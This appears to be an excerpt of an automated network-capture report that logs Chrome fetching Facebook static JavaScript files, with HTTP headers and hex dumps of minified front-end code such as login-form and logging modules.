                                                                                                                                                                                                                                  X-FB-Debug: KPuxMNBQsxQpRbVgUgCe68PiTWSq7U2wFlS0y6tvqjRi0Cv/22YIAz8SzkOVQzIDGSSW9kivWke6iwdCTtMSwg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=1, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 49907
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 4c 6f 67 69 6e 46 6f 72 6d 54 6f 67 67 6c 65 22 2c 5b 22 63 78 22 2c 22 43 53 53 22 2c 22 44 4f 4d 22 2c 22 67 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 76 61 72 20 65 3d 63 28 22 67 65 22 29 28 22 70 61 73 73 22 29 3b 64 28 22 43 53 53 22 29 2e 68 69 64 65 28 61 29 3b 45 76 65 6e 74 2e 6c 69 73 74 65 6e 28 65 2c 22 6b 65 79 75 70 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 53 74 72 69 6e 67 28 65 2e 76 61 6c 75 65 29 3b 63 2e 6c 65 6e 67 74 68 21 3d 3d 30 3f 28 64 28 22 43 53 53 22 29 2e 73 68 6f 77 28 61 29 2c 64 28 22 43 53 53 22 29 2e
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("LoginFormToggle",["cx","CSS","DOM","ge"],(function(a,b,c,d,e,f,g,h){"use strict";function a(a,b){var e=c("ge")("pass");d("CSS").hide(a);Event.listen(e,"keyup",function(){var c=String(e.value);c.length!==0?(d("CSS").show(a),d("CSS").
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 45 3a 37 32 30 2c 46 41 49 4c 5f 46 41 4c 53 45 5f 4e 45 47 41 54 49 56 45 3a 37 32 31 2c 41 50 50 5f 43 52 41 53 48 3a 37 32 32 2c 54 45 53 54 5f 47 49 4e 44 49 3a 37 32 33 2c 54 54 54 54 3a 37 32 34 2c 42 55 47 5f 42 41 53 48 5f 41 43 54 49 4f 4e 3a 37 32 35 2c 42 55 47 5f 42 41 53 48 5f 54 45 53 54 3a 37 32 36 2c 49 4e 49 54 5f 4d 4f 42 49 4c 45 5f 43 4f 4e 46 49 47 3a 37 32 37 2c 53 55 43 43 45 53 53 5f 57 49 54 48 5f 56 43 5f 44 49 53 41 42 4c 45 44 3a 31 30 30 38 2c 44 45 4c 45 54 45 5f 52 45 43 4f 52 44 3a 31 31 31 35 2c 4e 4f 52 4d 41 4c 5f 53 45 41 52 43 48 5f 4c 45 41 56 45 3a 31 31 37 31 2c 4d 41 57 5f 53 48 49 4d 5f 49 4e 44 45 58 45 44 44 42 5f 53 45 54 55 50 3a 31 33 33 32 2c 4d 41 57 5f 46 54 53 5f 49 4e 44 45 58 45 44 44 42 5f 53 45 54 55
                                                                                                                                                                                                                                  Data Ascii: E:720,FAIL_FALSE_NEGATIVE:721,APP_CRASH:722,TEST_GINDI:723,TTTT:724,BUG_BASH_ACTION:725,BUG_BASH_TEST:726,INIT_MOBILE_CONFIG:727,SUCCESS_WITH_VC_DISABLED:1008,DELETE_RECORD:1115,NORMAL_SEARCH_LEAVE:1171,MAW_SHIM_INDEXEDDB_SETUP:1332,MAW_FTS_INDEXEDDB_SETU
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 72 5f 69 64 3a 28 68 7c 7c 28 68 3d 64 28 22 51 50 4c 45 76 65 6e 74 22 29 29 29 2e 67 65 74 4d 61 72 6b 65 72 49 64 28 61 29 2c 61 63 74 69 6f 6e 5f 69 64 3a 35 31 2c 69 6e 73 74 61 6e 63 65 5f 69 64 3a 30 2c 73 61 6d 70 6c 65 5f 72 61 74 65 3a 6b 2c 6d 65 74 68 6f 64 3a 6d 2e 67 65 74 28 65 29 2c 64 61 5f 74 79 70 65 3a 62 2c 64 61 5f 6c 65 76 65 6c 3a 63 2c 6d 65 74 61 64 61 74 61 3a 7b 61 70 70 6c 69 63 61 74 69 6f 6e 5f 61 6e 61 6c 79 74 69 63 73 3a 7b 74 69 6d 65 5f 73 69 6e 63 65 5f 71 70 6c 5f 6d 6f 64 75 6c 65 5f 69 6e 69 74 3a 67 2d 74 68 69 73 2e 24 31 2e 6d 6f 64 75 6c 65 4c 6f 61 64 54 69 6d 65 73 74 61 6d 70 7d 7d 2c 6d 61 72 6b 65 72 5f 74 79 70 65 3a 31 2c 66 6c 61 67 73 3a 31 7d 3b 74 68 69 73 2e 24 31 33 28 6c 28 6b 2c 66 29 29 7d 3b 62
                                                                                                                                                                                                                                  Data Ascii: r_id:(h||(h=d("QPLEvent"))).getMarkerId(a),action_id:51,instance_id:0,sample_rate:k,method:m.get(e),da_type:b,da_level:c,metadata:{application_analytics:{time_since_qpl_module_init:g-this.$1.moduleLoadTimestamp}},marker_type:1,flags:1};this.$13(l(k,f))};b
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1266INData Raw: 67 69 6e 49 6e 69 74 69 61 6c 4c 6f 61 64 4c 6f 67 67 65 72 22 2c 5b 22 51 75 69 63 6b 4c 6f 67 41 63 74 69 6f 6e 54 79 70 65 22 2c 22 51 75 69 63 6b 50 65 72 66 6f 72 6d 61 6e 63 65 4c 6f 67 67 65 72 22 2c 22 52 75 6e 22 2c 22 71 70 6c 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 31 2c 6a 3d 32 3b 61 3d 7b 6f 6e 4c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 68 7c 7c 28 68 3d 63 28 22 51 75 69 63 6b 50 65 72 66 6f 72 6d 61 6e 63 65 4c 6f 67 67 65 72 22 29 29 29 2e 6d 61 72 6b 65 72 53 74 61 72 74 46 72 6f 6d 4e 61 76 53 74 61 72 74 28 63 28 22 71 70 6c 22 29 2e 5f 28 32 35 30 33 35 30 36 31 37 2c 22 32 34 34 34 22 29 2c 69 29 3b 76 61 72 20 62 3d
                                                                                                                                                                                                                                  Data Ascii: ginInitialLoadLogger",["QuickLogActionType","QuickPerformanceLogger","Run","qpl"],(function(a,b,c,d,e,f,g){"use strict";var h,i=1,j=2;a={onLoad:function(a){(h||(h=c("QuickPerformanceLogger"))).markerStartFromNavStart(c("qpl")._(250350617,"2444"),i);var b=


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  42192.168.2.649768157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC581OUTGET /rsrc.php/v3/yg/r/5VtnQAqNe99.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: pvgShi+mxFj+MB0MDiof2A==
                                                                                                                                                                                                                                  Expires: Sun, 28 Sep 2025 06:00:29 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: CMYBJYGUCZ05o+ktQT48Ywf2su4EyrDjvxYt3pIRu78BB2YBn+fFpOUKi/Wo8zXXAZq4OUmdDLOKxDliCUgPDw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 176168
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3a 22 61 76 22 2c 45 4e 43 52 59 50 54 45 44 5f 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3a 22 65 61 76 22 7d 29 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 4c 6f 67 67 65 72 22 2c 5b 22 63 72 3a 39 39 38 39 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 72 65 74 75 72 6e 7b 6c 6f 67 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 62
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ActorURIConfig",[],(function(a,b,c,d,e,f){a=Object.freeze({PARAMETER_ACTOR:"av",ENCRYPTED_PARAMETER_ACTOR:"eav"});f["default"]=a}),66);__d("BanzaiLogger",["cr:9989"],(function(a,b,c,d,e,f,g){function h(a){return{log:function(c,d){b
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 22 64 69 73 61 62 6c 65 64 2d 69 63 6f 6e 22 3a 22 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 22 64 69 73 61 62 6c 65 64 2d 74 65 78 74 22 3a 22 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 64 69 76 69 64 65 72 3a 22 23 33 45 34 30 34 32 22 2c 22 65 76 65 6e 74 2d 64 61 74 65 22 3a 22 23 46 33 34 32 35 46 22 2c 22 66 62 2d 77 6f 72 64 6d 61 72 6b 22 3a 22 23 46 46 46 46 46 46 22 2c 22 66 62 2d 6c 6f 67 6f 22 3a 22 23 30 38 36 36 46 46 22 2c 22 66 69 6c 74 65 72 2d 61 63 63 65 6e 74 22 3a 22 69 6e 76 65 72 74 28 34 30 25 29 20 73 65 70 69 61 28 35 32 25 29 20 73 61 74 75 72 61 74 65 28 32 30 30 25 29 20 73 61 74 75 72 61
                                                                                                                                                                                                                                  Data Ascii: a(255, 255, 255, 0.3)","disabled-icon":"rgba(255, 255, 255, 0.3)","disabled-text":"rgba(255, 255, 255, 0.3)",divider:"#3E4042","event-date":"#F3425F","fb-wordmark":"#FFFFFF","fb-logo":"#0866FF","filter-accent":"invert(40%) sepia(52%) saturate(200%) satura
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 65 6e 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 32 37 2c 32 35 30 2c 32 32 34 29 22 2c 22 67 72 65 65 6e 2d 74 65 72 74 69 61 72 79 22 3a 22 72 67 62 28 32 36 2c 36 38 2c 32 37 29 22 2c 22 6d 61 67 65 6e 74 61 2d 70 72 69 6d 61 72 79 22 3a 22 72 67 62 28 32 31 35 2c 37 37 2c 32 30 34 29 22 2c 22 6d 61 67 65 6e 74 61 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 35 35 2c 32 33 39 2c 32 35 34 29 22 2c 22 6d 61 67 65 6e 74 61 2d 74 65 72 74 69 61 72 79 22 3a 22 72 67 62 28 39 36 2c 33 36 2c 39 31 29 22 2c 22 6f 72 61 6e 67 65 2d 70 72 69 6d 61 72 79 22 3a 22 72 67 62 28 32 30 38 2c 31 30 38 2c 32 30 29 22 2c 22 6f 72 61 6e 67 65 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 35 35 2c 32 34 31 2c 32 33 39 29 22 2c 22 6f 72 61 6e 67
                                                                                                                                                                                                                                  Data Ascii: en-secondary":"rgb(227,250,224)","green-tertiary":"rgb(26,68,27)","magenta-primary":"rgb(215,77,204)","magenta-secondary":"rgb(255,239,254)","magenta-tertiary":"rgb(96,36,91)","orange-primary":"rgb(208,108,20)","orange-secondary":"rgb(255,241,239)","orang
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 2c 20 30 2c 20 30 2e 31 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 70 61 73 73 69 76 65 2d 6d 6f 76 65 2d 6f 75 74 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 2c 20 30 2c 20 30 2e 31 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 71 75 69 63 6b 2d 6d 6f 76 65 2d 69 6e 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 2c 20 30 2e 39 2c 20 30 2e 32 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 71 75 69 63 6b 2d 6d 6f 76 65 2d 6f 75 74 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 2c 20 30 2e 39 2c 20 30 2e 32 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 61 64 65 2d 69 6e 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65
                                                                                                                                                                                                                                  Data Ascii: bic-bezier(0.5, 0, 0.1, 1)","fds-animation-passive-move-out":"cubic-bezier(0.5, 0, 0.1, 1)","fds-animation-quick-move-in":"cubic-bezier(0.1, 0.9, 0.2, 1)","fds-animation-quick-move-out":"cubic-bezier(0.1, 0.9, 0.2, 1)","fds-animation-fade-in":"cubic-bezie
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1500INData Raw: 6e 63 65 28 29 3d 3d 3d 33 29 72 65 74 75 72 6e 21 30 3b 65 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 69 66 28 66 2e 74 72 69 67 67 65 72 4f 6e 52 65 70 65 61 74 73 3d 3d 3d 21 31 26 26 62 2e 72 65 70 65 61 74 3d 3d 3d 21 30 29 72 65 74 75 72 6e 21 31 3b 69 66 28 65 21 3d 6e 75 6c 6c 29 7b 69 66 28 66 2e 63 6f 6d 6d 61 6e 64 21 3d 6e 75 6c 6c 26 26 73 28 62 2e 74 61 72 67 65 74 2c 66 29 26 26 67 2e 67 65 74 4d 6f 64 69 66 69 65 64 4b 65 79 62 6f 61 72 64 53 68 6f 72 74 63 75 74 73 50 72 65 66 65 72 65 6e 63 65 28 29 3d 3d 3d 34 29 7b 77 2e 63 75 72 72 65 6e 74 28 66 2e 63 6f 6d 6d 61 6e 64 2c 66 2e 73 69 6e 67 6c 65 43 68 61 72 44 65 73 63 72 69 70 74 69 6f 6e 29 3b 72 65 74 75 72 6e 21 30 7d 68 3d 67 26 26 67 2e 67 65 74 41 72 65 53
                                                                                                                                                                                                                                  Data Ascii: nce()===3)return!0;e&&b.preventDefault()}if(f.triggerOnRepeats===!1&&b.repeat===!0)return!1;if(e!=null){if(f.command!=null&&s(b.target,f)&&g.getModifiedKeyboardShortcutsPreference()===4){w.current(f.command,f.singleCharDescription);return!0}h=g&&g.getAreS
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC14884INData Raw: 43 6f 6d 6d 61 6e 64 43 6f 6e 74 65 78 74 22 29 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7a 2c 63 68 69 6c 64 72 65 6e 3a 42 7d 29 7d 64 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 64 2e 6e 61 6d 65 2b 22 20 5b 66 72 6f 6d 20 22 2b 66 2e 69 64 2b 22 5d 22 3b 72 65 74 75 72 6e 20 64 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 63 72 65 61 74 65 4b 65 79 43 6f 6d 6d 61 6e 64 57 69 64 67 65 74 22 2c 5b 22 63 72 65 61 74 65 4b 65 79 43 6f 6d 6d 61 6e 64 57 72 61 70 70 65 72 22 2c 22 72 65 61 63 74 22 2c 22 72 65 63 6f 76 65 72 61 62 6c 65 56 69 6f 6c 61 74 69 6f 6e 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 68 7c
                                                                                                                                                                                                                                  Data Ascii: CommandContext").Provider,{value:z,children:B})}d.displayName=d.name+" [from "+f.id+"]";return d}g["default"]=a}),98);__d("createKeyCommandWidget",["createKeyCommandWrapper","react","recoverableViolation"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h|
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 26 28 69 7c 7c 28 69 3d 63 28 22 73 75 73 70 65 6e 64 4f 72 54 68 72 6f 77 49 66 55 73 65 64 49 6e 53 53 52 22 29 29 29 28 22 4c 6f 61 64 69 6e 67 20 6f 66 20 62 6f 6f 74 6c 6f 61 64 65 64 20 61 6e 64 20 54 33 20 63 6f 6d 70 6f 6e 65 6e 74 73 20 69 73 20 64 69 73 61 62 6c 65 64 20 64 75 72 69 6e 67 20 53 53 52 22 29 3b 76 61 72 20 64 3d 62 2e 67 65 74 4d 6f 64 75 6c 65 49 64 28 29 3b 69 66 28 21 6a 5b 64 5d 29 7b 62 3d 6a 5b 64 5d 3d 62 2e 6c 6f 61 64 28 29 3b 62 5b 22 66 69 6e 61 6c 6c 79 22 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6a 5b 64 5d 7d 29 7d 74 68 72 6f 77 20 6a 5b 64 5d 7d 72 65 74 75 72 6e 20 61 7d 67 2e 70 72 65 6c 6f 61 64 3d 61 3b 67 2e 72 65 61 64 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 50 55 50 72 65 73 73 75
                                                                                                                                                                                                                                  Data Ascii: &(i||(i=c("suspendOrThrowIfUsedInSSR")))("Loading of bootloaded and T3 components is disabled during SSR");var d=b.getModuleId();if(!j[d]){b=j[d]=b.load();b["finally"](function(){delete j[d]})}throw j[d]}return a}g.preload=a;g.read=b}),98);__d("CPUPressu
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC16384INData Raw: 3b 0a 5f 5f 64 28 22 4d 65 6d 6f 72 79 55 74 69 6c 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 6d 6f 72 79 7d 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 64 65 76 69 63 65 4d 65 6d 6f 72 79 7d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61
                                                                                                                                                                                                                                  Data Ascii: ;__d("MemoryUtils",[],(function(a,b,c,d,e,f){"use strict";function g(){return window.performance&&window.performance.memory}function h(){return window.navigator&&window.navigator.deviceMemory}function a(){return window.performance&&typeof window.performa
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC14884INData Raw: 6c 6c 26 26 28 63 28 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 22 29 28 6c 29 2c 6c 3d 6e 75 6c 6c 29 2c 6d 28 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 2c 62 29 7b 69 66 28 21 64 28 22 56 69 73 69 62 69 6c 69 74 79 41 50 49 22 29 2e 69 73 56 69 73 69 62 69 6c 69 74 79 48 69 64 64 65 6e 28 29 26 26 6f 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 6f 3b 62 26 26 28 6b 3d 7b 61 66 66 65 63 74 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 3a 5b 5d 2c 6d 65 74 72 69 63 73 3a 63 28 22 4f 6e 65 54 72 61 63 65 43 6f 72 65 22 29 2e 73 74 61 72 74 54 72 61 63 65 28 63 28 22 75 75 69 64 76 34 22 29 28 29 2c 61 2c 22 52 45 53 50 4f 4e 53 49 56 45 4e 45 53 53 22 2c 63 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 4e 6f 77 53 69 6e 63 65 41
                                                                                                                                                                                                                                  Data Ascii: ll&&(c("clearInterval")(l),l=null),m(a,b)}function q(a,b){if(!d("VisibilityAPI").isVisibilityHidden()&&o){var e=function(){var b=o;b&&(k={affectedInteractions:[],metrics:c("OneTraceCore").startTrace(c("uuidv4")(),a,"RESPONSIVENESS",c("performanceNowSinceA


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  43192.168.2.649771157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC581OUTGET /rsrc.php/v3/ys/r/pg8jih5T_9q.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:19 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: S/RW7UT0dsoYKhdDMbB2ng==
                                                                                                                                                                                                                                  Expires: Thu, 25 Sep 2025 17:38:33 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: g244AvYtfnioKAF+7uAL2Q9CFPpwoNPDOeesv6fRC5gxiZpox4Ghfa8DYaSIBf0u/0ngDbLzgQLHWYaYFYdRSg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:19 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=4, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 17188
